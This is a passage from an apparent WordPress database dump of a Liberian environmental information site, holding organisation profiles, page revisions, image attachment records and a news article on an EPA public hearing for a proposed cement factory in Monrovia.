training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.</p>		\n			<h2>Featured Projects </h2>		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"www.habitat.org\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"300\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/02/future-project-300x150.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/02/future-project-300x150.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2020/02/future-project-1024x512.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2020/02/future-project-768x384.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2020/02/future-project.jpg 1280w\" sizes=\"(max-width: 300px) 100vw, 300px\" />								</a>\n											<figcaption>Water, sanitation and hygiene</figcaption>\n										</figure>\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Habitat for Humanity International','','inherit','closed','closed','','2964-revision-v1','','','2020-02-26 16:57:22','2020-02-26 16:57:22','',2964,'https://ekmsliberia.info/2964-revision-v1/',0,'revision','',0),(3003,38,'2020-02-26 16:59:00','2020-02-26 16:59:00','<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.</p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.</p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.</p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.</p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.</p><p>FFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.</p>		\n			<h2>Featured Projects </h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Habitat for Humanity International','','inherit','closed','closed','','2964-revision-v1','','','2020-02-26 16:59:00','2020-02-26 16:59:00','',2964,'https://ekmsliberia.info/2964-revision-v1/',0,'revision','',0),(3004,38,'2020-02-26 17:27:38','2020-02-26 17:27:38','Ever Green Environmental Corporation is an independent business enterprise focused on advancing environmental practices, products and services for residences, businesses and the community,Ever Green Environmental has developed a suite of \"Green Management Services\". We help business, institutional, commercial and government operators to set up effective waste management and recycling programs.\r\n\r\nWaste Audits involve sorting and analysis of garbage collected during a sample period from all business operations. This audit focuses on:\r\n<ul class=\"htp\">\r\n 	<li>What is being thrown out?</li>\r\n 	<li>What percentage of items being thrown out could have been recycled?</li>\r\n 	<li>How much of what is thrown out is true garbage?</li>\r\n</ul>\r\nThis waste audit identifies waste reduction opportunities, and sets parameters for the business\'s own \"R4\" Objectives - Reduce, Reuse, Recycle, and Recover.','Evergreen Recycling Institute','','publish','closed','closed','','ever-green-recycling','','','2022-09-14 14:44:20','2022-09-14 14:44:20','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=3004',18,'institution','',0),(3005,38,'2020-02-26 17:51:49','2020-02-26 17:51:49','Years of research, consultations and deliberations have lead to Forum Syd extending support to civil society in Liberia. The programme focuses on supporting the growth of a donor independent civil society and pays extra attention to land rights.\r\n\r\nSupport has since 2001 been channeled from Forum Syd through sub-granting to Swedish organisations but as of 2019 direct partnerships are being formed with around 12 Liberian civil society organisations.\r\n\r\nThe question of access to land is a complex and conflict sensitive issue. Overall, about 90 percent of civil court cases in Liberia relate to land, and nearly two thirds of violent conflicts have their roots in land rights issues.\r\n\r\nAt the same time, Liberia is perceived to also hold one of the most progressive Land Rights Act in the world, one that recognises customary land rights. The Act grants people and communities equal right to ancestral land as private ownership have over the same land. Customary land constitutes roughly 70 per cent of Liberian land.\r\n','Forum Syd (FS) Inc.','','publish','closed','closed','','forum-syd-fs-inc','','','2021-08-17 21:03:49','2021-08-17 21:03:49','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=3005',14,'institution','',0),(3006,38,'2020-02-26 17:38:44','2020-02-26 17:38:44','Green Stewards Inc. (GSI) is a registered for profit non-governmental organization that was founded in December 2018 by Olivia P. Livingstone, after recognizing the environmental needs and gaps in her Country, Liberia. GSI was founded to cultivate the minds of people and instill within them a sense of care towards the environment by creating awareness on environmental issues.\r\nGSI, being cognizant of the concerted efforts being made globally that are aimed at creating a sustainable planet is committed to finding innovative and sustainable mitigation measures to environmental challenges as a means of backing the sustainable movement.\r\nGreen Stewards Inc. was certified by the Environmental Protection Agency of The Republic of Liberia on March 29, 2019 to implement all of its projects.','Green Steward Inc.','','publish','closed','closed','','green-steward-inc','','','2022-09-14 14:37:28','2022-09-14 14:37:28','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=3006',17,'institution','',0),(3008,38,'2020-02-26 17:27:38','2020-02-26 17:27:38','Ever Green Environmental Corporation is an independent business enterprise focused on advancing environmental practices, products and services for residences, businesses and the community,Ever Green Environmental has developed a suite of \"Green Management Services\". We help business, institutional, commercial and government operators to set up effective waste management and recycling programs.\r\n\r\nWaste Audits involve sorting and analysis of garbage collected during a sample period from all business operations. This audit focuses on:\r\n<ul class=\"htp\">\r\n 	<li>What is being thrown out?</li>\r\n 	<li>What percentage of items being thrown out could have been recycled?</li>\r\n 	<li>How much of what is thrown out is true garbage?</li>\r\n</ul>\r\nThis waste audit identifies waste reduction opportunities, and sets parameters for the business\'s own \"R4\" Objectives - Reduce, Reuse, Recycle, and Recover.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ci\" page_length=\"false\"]','Ever Green Recycling','','inherit','closed','closed','','3004-revision-v1','','','2020-02-26 17:27:38','2020-02-26 17:27:38','',3004,'https://ekmsliberia.info/3004-revision-v1/',0,'revision','',0),(3009,38,'2020-02-26 17:33:19','2020-02-26 17:33:19','<h3><strong>COMING SOON!!!!!!</strong></h3>\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Habitat for Humanity International','','inherit','closed','closed','','2964-revision-v1','','','2020-02-26 17:33:19','2020-02-26 17:33:19','',2964,'https://ekmsliberia.info/2964-revision-v1/',0,'revision','',0),(3011,38,'2020-02-26 17:38:44','2020-02-26 17:38:44','Green Stewards Inc. (GSI) is a registered for profit non-governmental organization that was founded in December 2018 by Olivia P. Livingstone, after recognizing the environmental needs and gaps in her Country, Liberia. GSI was founded to cultivate the minds of people and instill within them a sense of care towards the environment by creating awareness on environmental issues.\r\nGSI, being cognizant of the concerted efforts being made globally that are aimed at creating a sustainable planet is committed to finding innovative and sustainable mitigation measures to environmental challenges as a means of backing the sustainable movement.\r\nGreen Stewards Inc. was certified by the Environmental Protection Agency of The Republic of Liberia on March 29, 2019 to implement all of its projects.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Green Steward Inc.','','inherit','closed','closed','','3006-revision-v1','','','2020-02-26 17:38:44','2020-02-26 17:38:44','',3006,'https://ekmsliberia.info/3006-revision-v1/',0,'revision','',0),(3012,38,'2020-02-26 17:51:22','2020-02-26 17:51:22','','West African sunset - Liberia','','inherit','open','closed','','west-african-sunset-liberia','','','2020-02-26 17:51:22','2020-02-26 17:51:22','',3005,'https://ekmsliberia.info/wp-content/uploads/2020/02/West-African-sunset-Liberia.jpg',0,'attachment','image/jpeg',0),(3013,38,'2020-02-26 17:51:49','2020-02-26 17:51:49','Years of research, consultations and deliberations have lead to Forum Syd extending support to civil society in Liberia. The programme focuses on supporting the growth of a donor independent civil society and pays extra attention to land rights.\r\n\r\nSupport has since 2001 been channeled from Forum Syd through sub-granting to Swedish organisations but as of 2019 direct partnerships are being formed with around 12 Liberian civil society organisations.\r\n\r\nThe question of access to land is a complex and conflict sensitive issue. Overall, about 90 percent of civil court cases in Liberia relate to land, and nearly two thirds of violent conflicts have their roots in land rights issues.\r\n\r\nAt the same time, Liberia is perceived to also hold one of the most progressive Land Rights Act in the world, one that recognises customary land rights. The Act grants people and communities equal right to ancestral land as private ownership have over the same land. Customary land constitutes roughly 70 per cent of Liberian land.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Forum Syd (FS) Inc.','','inherit','closed','closed','','3005-revision-v1','','','2020-02-26 17:51:49','2020-02-26 17:51:49','',3005,'https://ekmsliberia.info/3005-revision-v1/',0,'revision','',0),(3015,38,'2020-03-02 14:22:58','2020-03-02 14:22:58','','logo-ci','','inherit','open','closed','','logo-ci','','','2020-03-02 14:22:58','2020-03-02 14:22:58','',1612,'https://ekmsliberia.info/wp-content/uploads/2019/11/logo-ci.png',0,'attachment','image/png',0),(3016,38,'2020-03-02 14:30:05','2020-03-02 14:30:05','','ci office pic','','inherit','open','closed','','ci-office-pic','','','2020-03-02 14:30:05','2020-03-02 14:30:05','',1612,'https://ekmsliberia.info/wp-content/uploads/2019/11/ci-office-pic.png',0,'attachment','image/png',0),(3017,38,'2020-03-02 14:55:15','2020-03-02 14:55:15','','ffi_new_logo_text_right_colour','ffi_new_logo_text_right_colour','inherit','open','closed','','ffi_new_logo_text_right_colour','','','2020-03-02 14:55:15','2020-03-02 14:55:15','',1614,'https://ekmsliberia.info/wp-content/uploads/2019/11/ffi.jpg',0,'attachment','image/jpeg',0),(3018,38,'2020-03-02 14:58:59','2020-03-02 14:58:59','Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.\n\nDrawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.\n\nWe are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.\n\nRecognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.\n\nCommunity involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.\n\nFFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.\n<h2>Featured Projects</h2>\n<h2>Related Documents</h2>\n[posts_table post_type=\"document\"\ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Fauna & Flora International','','inherit','closed','closed','','1614-autosave-v1','','','2020-03-02 14:58:59','2020-03-02 14:58:59','',1614,'https://ekmsliberia.info/1614-autosave-v1/',0,'revision','',0),(3019,38,'2020-03-02 17:24:38','2020-03-02 17:24:38','','Mota','','inherit','open','closed','','mota','','','2020-03-02 17:24:38','2020-03-02 17:24:38','',1598,'https://ekmsliberia.info/wp-content/uploads/2019/11/Mota.jpg',0,'attachment','image/jpeg',0),(3020,38,'2020-03-02 17:25:05','2020-03-02 17:25:05','','mot','','inherit','open','closed','','mot','','','2020-03-02 17:25:05','2020-03-02 17:25:05','',1598,'https://ekmsliberia.info/wp-content/uploads/2019/11/mot.jpg',0,'attachment','image/jpeg',0),(3021,38,'2020-03-02 17:25:26','2020-03-02 17:25:26','The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.\r\n\r\nThrough its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mot\" page_length=\"false\"]','Ministry of Transport','','inherit','closed','closed','','1598-revision-v1','','','2020-03-02 17:25:26','2020-03-02 17:25:26','',1598,'https://ekmsliberia.info/1598-revision-v1/',0,'revision','',0),(3022,38,'2020-03-02 17:32:58','2020-03-02 17:32:58','','download (3)','','inherit','open','closed','','download-3','','','2020-03-02 17:32:58','2020-03-02 17:32:58','',1602,'https://ekmsliberia.info/wp-content/uploads/2019/11/download-3.jpg',0,'attachment','image/jpeg',0),(3023,38,'2020-03-03 15:32:41','2020-03-03 15:32:41','<!-- wp:paragraph -->\n<p>Residents of four communities on Bushrod Island have\nregistered ‘no objection’ to the construction of a new cement factory in\nBillimah community opposite the National Port of Authority (NPA) Headquarters\nin Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Residents of Billimah, Sawmill, Bassa Town and Jamaica Road over\nthe weekend during a public hearing on the Environmental Social Impact\nAssessment (ESIA) Report for the construction of the new factory said the proposed\nStar Cement Corporation Grinding and Packaging Plant would provide jobs for\nmembers of their communities. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;The ESIA was prepared\nby Liberia Engineering and Geo-Tech Consultant (LEG Consultant), an independent\nenvironmental evaluator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The public hearing, which attracted residents of four\ncommunities, representatives of line government ministries and agencies,\nadministrators of Boatswain Junior High School and Montserrado County District\n# 13 Representative, Edward P. Flomo was held by the Environmental Protection\nAgency of Liberia (EPA) in accordance with the Environmental Protection and\nManagement Law of Liberia (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kawusu M. Toure, assistant manager for ESIA at the EPA said\nthe gathering was intended to review and get citizens inputs on the study done\nby LEG Consultant on the environmental and social impacts the proposed Star\nCement Corporation Grinding and Packaging Plant will have on local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Star Cement Corporation Grinding and Packaging Plant is\nown by Sethi Brothers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ESIA process is a systemic procedure to identify, predict\nand evaluate the potential environmental and socio-economic effects of proposed\nprojects, plans or policies. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This process is applied prior to issuance of environmental\npermits,” Mr. Toure told a gathering of Stakeholders at the Arabic and English\nSchool in Bilimah. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that the ESIA process helps to provide key and\nrelevant stakeholders with information about the likely potential impacts of\nprojects. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In some cases, Mr. Toure disclosed that the outcome of the\nESIA process may require a developer to alter or in extreme cases abandon a\nproject. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the start of stakeholders’ consultation, EPA\nDeputy Executive Director, Randall M. Dobayou said the intent of the\nstakeholder review was not to compel residents to accept the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We have not come to impose on you. We are not here to tell\nyou that the project will not have negative impacts or positive impacts. We\nhave come to present the facts so that you can make a determination,” He told\nresidents.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the law requires that citizens participate\nin the management of their natural resources and noted “in this case the\nenvironment is your natural resources.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“You are habitants of the various communities and you will\nbe interacting with the proposed company and you will be directly impacted\neither negatively or positively by the project,” Hon. Dobayou said. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the issuance of an environmental permit\nfor the construction of the new cement factory will be based on submissions\nthat participants will make during the stakeholder review.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, EPA Manager for Compliance and Enforcement\nJohn K. Jallah disclosed that the EPA has done a technical review of the\nproposed project and assured residents that there will be a periodic review of\nthe project to ensure that it remains in compliance with the environmental laws\nand what is contained in its ESIA document.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We will have environmental technicians and quality\ntechnicians coming on the field quarterly to verify the reports Star Cement\nCorporation will be providing to the EPA to ensure that </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Manager Jallah threatened to revoke the company’s permit,\nwhen it comes in conflict with its permit conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He dismissed public perception that the EPA is only concern\nwith the granting of permits to project exponents. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a powerpoint presentation, LEG Consultants Technical\nDirector Jallah Nelson disclosed that his company was hired to conduct an ESIA\nstudy for the construction of a Cement Grinding and Packaging Plant (CGPP) on a\n4 acres of land within the vicinity of Sethi Brother Compound on Bushrod Island.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nelson explained that the factory will be used for the\nproduction and sale of cement and provide services that will translate into\ncustomer satisfaction, corporate credibility and creates employment\nopportunities in and around Liberia. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the company will produce three grades of\ncement including CEM II 32 R, CEM II 42.5R and CEM II 52.2R Grades during its\nten hours daily operation\nwhich will start from 8am to 5pm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“A new 130 tons cement packing machine will be installed to produce 600,000 tons of\ncement per year and in the\nproduction stage, raw materials like limestone will be source from Egypt and\nTurkey and ship to Liberia,” technician Nelson said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;He acknowledged that there will be some\npotential negative environmental impacts during and after the construction of\nthe plants, but assured that the company will institute several environmental\nmitigation measures to curtail threats to local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For\ninstance, Nelson explained that for air and dust emission which will occurred\nduring construction and operational phase of the project, Star Cement\nCorporation has employed several measures including paving the project site;\nsprinkling of water; the use of nose masks and PPEs by workers; the creation of\nsufficient ventilation at workplace, de-dusting system and the covering of\nspilled cement and conveyors at all times.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also disclosed that to mitigate noise pollution, the\ncompany will conduct a monthly noise monitoring to ensure that noise levels are\nbelow national and international standard, and ensure that vehicles and\nmachines are service regularly to reduce the high level of noise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nelson explained that Star Cement Corporation will fit noisy\nmachines with noise reduction devices, provide suitable hearing protection to\nall workers exposed to noise levels above 70dB; and as well post notices and\nsigns in noisy areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nelson’s presentation was followed by questions and answers.\nMost of the questions. Most of the questions was centered around jobs and\nsocial benefits for affected communities people. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Responding to some of the questions, Representative Flomo\nassured that the citizens’ concerns will be addressed by an MOU between\ncommunities and the Sethi Brothers prior to the commencement of the cement\nfactory.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that through his negotiation with Sethi, the\ncompany has agreed to construct a medical facility that will be accessible to\nresidents in affected areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In separate statements, leaders and youth representatives of\nthe four communities including Billimah, Sawmill, Jamaica Road and Bassa Town\nlauded authorities of the EPA for initiating the forum, which according to them\nwas never done in the case of Cemenco.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Charles F. Kaizai, Jamaica Road Community Leader said they\ncan’t resist the construction of the cement factory because it would provide\njobs and other opportunities for local residents, while Billimah Community\nChairman, A. Mulbah Dukuly expressed satisfaction for the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','EPA Holds Public Hearing for New Cement Factory','','publish','open','open','','epa-holds-public-hearing-for-new-cement-factory','','','2020-03-03 15:32:45','2020-03-03 15:32:45','',0,'https://ekmsliberia.info/?p=3023',204,'post','',0),(3024,38,'2020-03-03 15:28:58','2020-03-03 15:28:58','','DED','EPA Deputy Executive Director Randall M. Dobayou speaking at the public hearing','inherit','open','closed','','ded','','','2020-03-03 15:30:17','2020-03-03 15:30:17','',3023,'https://ekmsliberia.info/wp-content/uploads/2020/03/DED.jpg',0,'attachment','image/jpeg',0),(3025,38,'2020-03-03 15:31:21','2020-03-03 15:31:21','','DED','','inherit','open','closed','','ded-2','','','2020-03-03 15:31:42','2020-03-03 15:31:42','',3023,'https://ekmsliberia.info/wp-content/uploads/2020/03/DED-1.jpg',0,'attachment','image/jpeg',0),(3026,38,'2020-03-03 15:32:41','2020-03-03 15:32:41','<!-- wp:paragraph -->\n<p>Residents of four communities on Bushrod Island have\nregistered ‘no objection’ to the construction of a new cement factory in\nBillimah community opposite the National Port of Authority (NPA) Headquarters\nin Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Residents of Billimah, Sawmill, Bassa Town and Jamaica Road over\nthe weekend during a public hearing on the Environmental Social Impact\nAssessment (ESIA) Report for the construction of the new factory said the proposed\nStar Cement Corporation Grinding and Packaging Plant would provide jobs for\nmembers of their communities. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;The ESIA was prepared\nby Liberia Engineering and Geo-Tech Consultant (LEG Consultant), an independent\nenvironmental evaluator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The public hearing, which attracted residents of four\ncommunities, representatives of line government ministries and agencies,\nadministrators of Boatswain Junior High School and Montserrado County District\n# 13 Representative, Edward P. Flomo was held by the Environmental Protection\nAgency of Liberia (EPA) in accordance with the Environmental Protection and\nManagement Law of Liberia (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kawusu M. Toure, assistant manager for ESIA at the EPA said\nthe gathering was intended to review and get citizens inputs on the study done\nby LEG Consultant on the environmental and social impacts the proposed Star\nCement Corporation Grinding and Packaging Plant will have on local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Star Cement Corporation Grinding and Packaging Plant is\nown by Sethi Brothers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ESIA process is a systemic procedure to identify, predict\nand evaluate the potential environmental and socio-economic effects of proposed\nprojects, plans or policies. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This process is applied prior to issuance of environmental\npermits,” Mr. Toure told a gathering of Stakeholders at the Arabic and English\nSchool in Bilimah. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that the ESIA process helps to provide key and\nrelevant stakeholders with information about the likely potential impacts of\nprojects. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In some cases, Mr. Toure disclosed that the outcome of the\nESIA process may require a developer to alter or in extreme cases abandon a\nproject. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the start of stakeholders’ consultation, EPA\nDeputy Executive Director, Randall M. Dobayou said the intent of the\nstakeholder review was not to compel residents to accept the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We have not come to impose on you. We are not here to tell\nyou that the project will not have negative impacts or positive impacts. We\nhave come to present the facts so that you can make a determination,” He told\nresidents.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the law requires that citizens participate\nin the management of their natural resources and noted “in this case the\nenvironment is your natural resources.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“You are habitants of the various communities and you will\nbe interacting with the proposed company and you will be directly impacted\neither negatively or positively by the project,” Hon. Dobayou said. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the issuance of an environmental permit\nfor the construction of the new cement factory will be based on submissions\nthat participants will make during the stakeholder review.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, EPA Manager for Compliance and Enforcement\nJohn K. Jallah disclosed that the EPA has done a technical review of the\nproposed project and assured residents that there will be a periodic review of\nthe project to ensure that it remains in compliance with the environmental laws\nand what is contained in its ESIA document.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We will have environmental technicians and quality\ntechnicians coming on the field quarterly to verify the reports Star Cement\nCorporation will be providing to the EPA to ensure that </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Manager Jallah threatened to revoke the company’s permit,\nwhen it comes in conflict with its permit conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He dismissed public perception that the EPA is only concern\nwith the granting of permits to project exponents. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a powerpoint presentation, LEG Consultants Technical\nDirector Jallah Nelson disclosed that his company was hired to conduct an ESIA\nstudy for the construction of a Cement Grinding and Packaging Plant (CGPP) on a\n4 acres of land within the vicinity of Sethi Brother Compound on Bushrod Island.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nelson explained that the factory will be used for the\nproduction and sale of cement and provide services that will translate into\ncustomer satisfaction, corporate credibility and creates employment\nopportunities in and around Liberia. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the company will produce three grades of\ncement including CEM II 32 R, CEM II 42.5R and CEM II 52.2R Grades during its\nten hours daily operation\nwhich will start from 8am to 5pm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“A new 130 tons cement packing machine will be installed to produce 600,000 tons of\ncement per year and in the\nproduction stage, raw materials like limestone will be source from Egypt and\nTurkey and ship to Liberia,” technician Nelson said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;He acknowledged that there will be some\npotential negative environmental impacts during and after the construction of\nthe plants, but assured that the company will institute several environmental\nmitigation measures to curtail threats to local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For\ninstance, Nelson explained that for air and dust emission which will occurred\nduring construction and operational phase of the project, Star Cement\nCorporation has employed several measures including paving the project site;\nsprinkling of water; the use of nose masks and PPEs by workers; the creation of\nsufficient ventilation at workplace, de-dusting system and the covering of\nspilled cement and conveyors at all times.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also disclosed that to mitigate noise pollution, the\ncompany will conduct a monthly noise monitoring to ensure that noise levels are\nbelow national and international standard, and ensure that vehicles and\nmachines are service regularly to reduce the high level of noise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nelson explained that Star Cement Corporation will fit noisy\nmachines with noise reduction devices, provide suitable hearing protection to\nall workers exposed to noise levels above 70dB; and as well post notices and\nsigns in noisy areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nelson’s presentation was followed by questions and answers.\nMost of the questions. Most of the questions was centered around jobs and\nsocial benefits for affected communities people. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Responding to some of the questions, Representative Flomo\nassured that the citizens’ concerns will be addressed by an MOU between\ncommunities and the Sethi Brothers prior to the commencement of the cement\nfactory.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that through his negotiation with Sethi, the\ncompany has agreed to construct a medical facility that will be accessible to\nresidents in affected areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In separate statements, leaders and youth representatives of\nthe four communities including Billimah, Sawmill, Jamaica Road and Bassa Town\nlauded authorities of the EPA for initiating the forum, which according to them\nwas never done in the case of Cemenco.</p>\n<!-- 